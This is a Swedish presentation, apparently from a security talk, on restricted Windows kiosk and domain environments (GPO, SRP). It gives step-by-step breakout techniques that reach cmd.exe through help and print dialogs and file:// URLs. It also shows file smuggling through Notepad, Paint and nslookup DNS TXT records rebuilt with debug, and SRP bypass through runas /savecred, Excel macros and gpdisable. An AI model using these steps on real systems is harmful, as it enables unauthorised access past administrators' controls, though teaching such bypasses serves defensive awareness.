NETinfo Magnus Persson Johan Silverup Epost: Telefon: 046 –
Netinfo Begränsade datormiljöer - Vilka typer finns det? - Hur fungerar de? - Hur bryter man sig ut ur dem?
Olika typer av begränsningar Fysiska begränsningar; BIOS, mm Filtrering av trafik; IPS, brandvägg, mm Windows OS och domänkontroller
Windows OS kontroller Group Policy Objects (GPO) Software Restriction Policies (SRP) Tredje parts program
Group Policy Objects Kan begränsa användning av tjänster – IE, Windows Explorer, cmd.exe, mm Kan dölja saker – Menyer, ikoner, kontrollpanelen, mm Hundratals olika inställningar
Software Restriction Policies Är definierade i GPO Begränsar vilka program som får köras Två inställningar – Unrestricted – Disallowed
Vad vill vi ha? Kommandofönster, cmd.exe Ändra i filer, t.ex. notepad.exe Hämta filer, t.ex. en webbrowser
Utbrytning #1 Få upp en utskriftsdialogruta Klicka lägg till skrivare Leta efter nätverksskrivare, vilket namn som helst Felmeddelande; klicka på “Help and support center” Följ anvisningarna på nästa sida
Utbrytning #2 Klicka Help (F1) → Options → Home Klicka ”Help and Support Center” Klicka “Get Support or go to Win Newsgroup” Klicka “Go to Win Web site forum” Nu får du en webbläsare
Utbrytning #3 Under Hjälp, hitta Options → Internet options Gå till Browsing history under fliken General Klicka Settnings → View files eller View objects Explorer startar, gå till C:\System\Windows32 Högerklicka på cmd.exe och välj Run eller Open
Utbrytning #4 Fungerar med många program i Windows Klicka Hjälp → About → EULA Notepad startar!
Utbrytning #5 Dölj filer/foldrar i dialogrutor mha GPO Explorer visar inte dem Man kan fortfarande skriva in hela sökvägen C:\Windows\System32\cmd.exe
Utbrytning #6 Välj Help och högerklicka på programrutan i taskbar Välj “Jump to URL” Välj “file:\\C:\Windows\System32\cmd.exe”file:\\C:\Windows\System32\cmd.exe Välj Run när systemet frågar vad du vill göra Testa också –“ms-its:C\:Windows\Help\admtools.chm::\Admtools.html”
Hacka Kioskdatorer via WWW Skaffa access till en webbläasre Surfa till Stor samling interaktiva verktyg Windows/Linux/PhotoKat e
Så vad gör vi nu? Det finns många sätt att lura GPO utan SRP Vi har nu startat upp program Vad kan vi göra med dem?
Hämta filer med Notepad / Wordpad Klicka på Open file Skriv in URL i fältet Ftp:// / Ftp:// File:// / File:// Filen hämtas och lagras i Temporary Internet Files
Hämta filer med MS Paint Paint hämtar filer på samma sätt som Notepad Paint förstår bara bild-filer men de mellanlagras i – C:\Documents And Settings\ \Temporary Internet Files\Content.IE5\xxxxx\ C:\Documents
Hämta filer med nslookup Kräver egen domän och DNS-server Konvertera binärfiler till ASCII (dbgtool) Lägg in koden i DNS-serverns TXT-fält ”nslookup -querytype=TXT hackme.mydom.net”
Hämta filer med nslookup (2) Konvertera tillbaks från ASCII → binärkod Vi använder debugger som följer med Windows – ”debug < evil-ascii.txt” – ”ren #TEMP# evil-binary.exe”
Filer skyddade med SPR Det är svårare att komma runt SPR GPO gömmer bara filer och funktioner SPR hindrar filer att exekveras
Exekvera via “runas” ”Runas” exekverar filer under en annan användare ”runas /savecred /user: ” Fungerar inte om man väljer ”current user”
Kör kod via Excel All exekverbar kod kan inte skyddas med SPR Macro i Office-program är en “bakdörr” Man kan ladda binärkod i Excel-ark och exekvera Exekvera från Excelmacro med create_thread()
Manipulera processer ”gpdisable” Fanns på Sysinternals Hindrar access till en registernyckel för SPR e
Manipulera processer Basic Process Manipulation Toolkit (BPMT) Kan avaktivera GPO och SPR Körs från kommando-skal
NETinfo FRÅGOR?